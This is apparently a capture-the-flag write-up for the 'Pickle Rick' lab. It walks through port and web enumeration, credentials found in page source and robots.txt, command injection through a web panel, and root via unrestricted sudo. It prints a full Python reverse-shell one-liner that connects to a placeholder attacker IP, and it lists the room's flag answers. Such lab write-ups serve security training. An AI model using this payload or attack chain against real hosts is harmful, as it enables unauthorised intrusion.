================================================================================
CTF WRITEUP: PICKLE RICK
Target IP: 10.10.191.19
================================================================================

1. ENUMERATION & RECON
--------------------------------------------------------------------------------
Command: nmap -sC -sV 10.10.191.19
Results:
- 22/tcp (SSH)  - OpenSSH 8.2p1
- 80/tcp (HTTP) - Apache 2.4.41

Web Discovery:
- Source Code (Ctrl+U): Found hidden comment -> "Username: R1ckRul3s"
- /robots.txt: Contains string "Wubbalubbadubdub" (Potential password).
- Gobuster: Found /login.php and /assets/.

2. INITIAL ACCESS (COMMAND PANEL)
--------------------------------------------------------------------------------
Credentials: R1ckRul3s : Wubbalubbadubdub
Action: Logged into /login.php to find a "Command Panel" that executes 
system commands.

Exploiting Command Injection:
The "cat" command was disabled, but I used "grep -R ." to read files.
- Ingredient #1: Sup3rS3cretPickl3Ingred.txt -> "mr. meeseek hair"
- Clue: clue.txt -> "Look around the file system for the other ingredient."

3. REVERSE SHELL
--------------------------------------------------------------------------------
To get a more stable environment, I executed a Python3 reverse shell:
Payload:
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ATTACKER_IP]",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

4. LOCAL ENUMERATION
--------------------------------------------------------------------------------
- Ingredient #2: Found in /home/rick/second ingredients -> "1 jerry tear"
  (Note: Use quotes or backslashes for spaces in filenames).

5. PRIVILEGE ESCALATION
--------------------------------------------------------------------------------
Checking Sudo: sudo -l
Result: (ALL : ALL) NOPASSWD: ALL
Action: Simply ran "sudo bash" to gain root access.

6. FINAL INGREDIENTS
--------------------------------------------------------------------------------
1. mr. meeseek hair
2. 1 jerry tear
3. fleeb juice (Found in /root/3rd.txt)

================================================================================
